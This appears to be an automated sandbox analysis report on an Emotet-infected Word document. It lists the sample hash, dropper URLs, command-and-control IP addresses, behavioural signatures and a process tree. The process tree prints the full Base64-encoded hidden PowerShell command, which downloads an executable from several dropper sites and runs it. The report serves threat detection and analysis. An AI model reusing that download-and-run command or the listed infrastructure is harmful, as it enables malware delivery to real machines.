Analysis

  • max time kernel
    25s
  • resource
    win10v191014
  • submitted
    10-12-2019 01:07

General

  • Target

    33bf31ffc5b3c56199e0b5b8c952aeab2fb5319a73bdfcfc8ed0d5e0295b3c4a.doc

  • Sample

    191210-vzsg1fmrzs

  • SHA256

    33bf31ffc5b3c56199e0b5b8c952aeab2fb5319a73bdfcfc8ed0d5e0295b3c4a

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://profileonline360.com/Search-Replace-DB-master/cxesii/

exe.dropper

http://richardciccarone.com/watixl/KbSXxlb/

exe.dropper

http://aminulnakla.com/test/ERmpCOhO/

exe.dropper

http://abanti.mygifts.xyz/resources/u4et7xi3r-n6a4-65/

exe.dropper

http://38seventeen.com/wp-content/eSKnzZS/

Extracted

Family

emotet

C2

24.27.122.202:80

67.171.182.231:80

190.171.135.235:80

103.9.145.19:8080

46.105.128.215:8080

172.105.213.30:80

69.30.205.162:7080

115.179.91.58:80

181.44.166.242:80

78.46.87.133:8080

81.213.145.45:443

83.156.88.159:80

210.111.160.220:80

195.191.107.67:80

192.241.220.183:8080

1.32.54.12:8080

192.161.190.171:8080

190.189.79.73:80

122.11.164.183:80

41.77.74.214:443

rsa_pubkey.plain

Signatures

  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\33bf31ffc5b3c56199e0b5b8c952aeab2fb5319a73bdfcfc8ed0d5e0295b3c4a.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:4980
  • C:\Windows\system32\SppExtComObj.exe
    C:\Windows\system32\SppExtComObj.exe -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4408
    • C:\Windows\System32\SLUI.exe
      "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
      2⤵
        PID:4004
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABPAGsAegBxAGIAeABoAGIAZAB2AD0AJwBCAG8AbgB4AGUAdgBrAHQAawB6AGEAagAnADsAJABPAGEAbQBtAGcAZQBxAGIAdgBoACAAPQAgACcAMgAyADgAJwA7ACQAUgB6AGIAbgB4AHIAbwB1AGcAZABxAD0AJwBMAHUAaAB0AGYAdQBrAHMAcgB0AHgAJwA7ACQAWgB5AGkAcQBjAGgAcwBtAHMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAE8AYQBtAG0AZwBlAHEAYgB2AGgAKwAnAC4AZQB4AGUAJwA7ACQATgB6AHAAawBwAGwAcgBoAHEAYgBjAGkAeQA9ACcAVABoAHQAbgBkAHYAaABwAHMAZwBkACcAOwAkAEUAaQBxAG0AagBlAHQAcQB4AGEAagA9ACYAKAAnAG4AZQB3AC0AbwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBlAHQALgBXAEUAQgBjAGwAaQBFAG4AVAA7ACQAVQBkAHIAZgBlAGEAcgBhAHgAZQBhAGwAbgA9ACcAaAB0AHQAcABzADoALwAvAHAAcgBvAGYAaQBsAGUAbwBuAGwAaQBuAGUAMwA2ADAALgBjAG8AbQAvAFMAZQBhAHIAYwBoAC0AUgBlAHAAbABhAGMAZQAtAEQAQgAtAG0AYQBzAHQAZQByAC8AYwB4AGUAcwBpAGkALwAqAGgAdAB0AHAAOgAvAC8AcgBpAGMAaABhAHIAZABjAGkAYwBjAGEAcgBvAG4AZQAuAGMAbwBtAC8AdwBhAHQAaQB4AGwALwBLAGIAUwBYAHgAbABiAC8AKgBoAHQAdABwADoALwAvAGEAbQBpAG4AdQBsAG4AYQBrAGwAYQAuAGMAbwBtAC8AdABlAHMAdAAvAEUAUgBtAHAAQwBPAGgATwAvACoAaAB0AHQAcAA6AC8ALwBhAGIAYQBuAHQAaQAuAG0AeQBnAGkAZgB0AHMALgB4AHkAegAvAHIAZQBzAG8AdQByAGMAZQBzAC8AdQA0AGUAdAA3AHgAaQAzAHIALQBuADYAYQA0AC0ANgA1AC8AKgBoAHQAdABwADoALwAvADMAOABzAGUAdgBlAG4AdABlAGUAbgAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGUAUwBLAG4AegBaAFMALwAnAC4AIgBzAFAAYABsAEkAVAAiACgAJwAqACcAKQA7ACQAWAB6AGcAZQBtAGEAZQBwAGYAdgBvAGYAegA9ACcAVABlAGwAaAB1AHgAeQBrAHoAagB3AGIAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEcAagBwAGsAcwB3AHcAdgBxAGMAIABpAG4AIAAkAFUAZAByAGYAZQBhAHIAYQB4AGUAYQBsAG4AKQB7AHQAcgB5AHsAJABFAGkAcQBtAGoAZQB0AHEAeABhAGoALgAiAGQAbwB3AG4AYABMAG8AYQBgAEQAYABGAGkAbABFACIAKAAkAEcAagBwAGsAcwB3AHcAdgBxAGMALAAgACQAWgB5AGkAcQBjAGgAcwBtAHMAKQA7ACQAWABkAGwAYQBzAGoAcQB1AHgAdgA9ACcAWABvAGwAZgBpAGUAbgBtAHcAbgB2AHcAcQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFoAeQBpAHEAYwBoAHMAbQBzACkALgAiAEwAZQBgAE4AZwBUAEgAIgAgAC0AZwBlACAAMgAwADgANAA2ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABhAGAAUgB0ACIAKAAkAFoAeQBpAHEAYwBoAHMAbQBzACkAOwAkAEgAdgBwAHkAeABnAGkAcwBjAGYAZwA9ACcAWQBnAHAAagB5AGEAagB6ACcAOwBiAHIAZQBhAGsAOwAkAFMAbgB0AG0AawBpAHAAagA9ACcAQgBuAGMAZgB5AHkAcQBnAHQAZAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAGkAeQBnAGYAbQByAGEAcQBxAG0AdQB4AD0AJwBUAHkAawBtAHYAbwBvAGMAawAnAA==
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1748
      • C:\Users\Admin\228.exe
        "C:\Users\Admin\228.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4380
        • C:\Users\Admin\228.exe
          --1077e716
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EmotetMutantsSpam
          • Suspicious use of SetWindowsHookEx
          PID:3752

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    3
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\228.exe
    • C:\Users\Admin\228.exe
    • C:\Users\Admin\228.exe
    • memory/3752-12-0x0000000002040000-0x0000000002057000-memory.dmp
      Filesize

      92KB

    • memory/3752-13-0x0000000000400000-0x0000000000458000-memory.dmp
      Filesize

      352KB

    • memory/4380-10-0x0000000000620000-0x0000000000637000-memory.dmp
      Filesize

      92KB